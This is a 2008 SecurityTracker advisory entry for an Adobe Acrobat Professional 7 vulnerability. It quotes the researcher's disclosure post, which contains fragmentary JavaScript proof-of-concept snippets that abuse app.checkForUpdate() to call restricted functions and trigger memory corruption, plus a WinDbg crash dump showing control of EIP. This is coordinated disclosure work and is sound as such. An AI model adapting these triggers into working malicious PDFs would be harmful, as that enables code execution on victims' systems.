SecurityTracker Alert ID: 1019971|
SecurityTracker URL: http://securitytracker.com/id/1019971
(Links to External Site)
Date: May 7 2008
Execution of arbitrary code via network, User access via network|
Fix Available: Yes Vendor Confirmed: Yes |
Version(s): prior to 7.1.0|
A vulnerability was reported in Adobe Acrobat and Adobe Reader. A remote user can cause arbitrary code to be executed on the target user's system.|
Adobe Reader and Adobe Acrobat version 8.x are not affected.
The vendor was notified on November 2, 2007.
cocoruder reported this vulnerability.
A remote user can create a PDF file that, when loaded by the target user, will execute arbitrary code on the target user's system.|
The vendor has issued a fixed version (7.1.0), available at:|
The vendor's advisory is available at:
Vendor URL: www.adobe.com/support/security/bulletins/apsb08-13.html (Links to External Site)
Access control error|
|Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (macOS/OS X), UNIX (Solaris - SunOS), Windows (Any)|
This archive entry has one or more follow-up message(s) listed below.|
Source Message Contents
and Memory Corruption Vulnerabilities
Acrobat Professional 7. A remote attacker who successfully exploits
these vulnerabilities can execute restricted functions and arbitrary
codes on the affected system.
Affected Software Versions:
Adobe Acrobat Professional 7.0.9
These two vulnerabilities specially exist in an unpublicized
fucntion called "app.checkForUpdate()", which are exploited through a
Following is the POC for how to execute restricted functions:
app.alert("It will call app.newDoc()");
app.alert("function has been called");
As we know, when we call "app.newDoc()" normally, the function can
but the above code can still execute this function successfully, other
restricted functions can also be executed by exploiting this
The POC for triggering the memory corruption vulnerability:
app.alert("Corrupting the memory");
// Open a new report will corrupt the memory
var rep = new Report();
app.alert("If the application has not been crashed, try to close the
application and then you will get it.");
When we call the function "new Report()"(other functions maybe
useful too) in the function "Callback", it will corrupt the memory.
Debug informations from Windbg as follows:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
10101010 001b add byte ptr [ebx],bl ds:0023:00000040=??
0:000> u eip
10101010 001b add byte ptr [ebx],bl
10101012 6c ins byte ptr es:[edi],dx
10101013 0000 add byte ptr [eax],al
10101015 1b640000 sbb esp,dword ptr [eax+eax]
10101019 336000 xor esp,dword ptr [eax]
1010101c 0033 add byte ptr [ebx],dh
1010101e 60 pushad
1010101f 0000 add byte ptr [eax],al
It is running codes at an unexpected address.
working exploit for this vulnerability easily.
Note that because the special API does NOT exist in Adobe
Reader/Acrobat 8, as my test, the vulnerability does NOT affect Adobe
Adobe has released an advisory for this vulnerability which is available on:
Fortinet advisory can be found at:
2007.11.01 Vendor notified via email
2007.11.02 Vendor responded
2008.05.06 Coordinated public disclosure
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/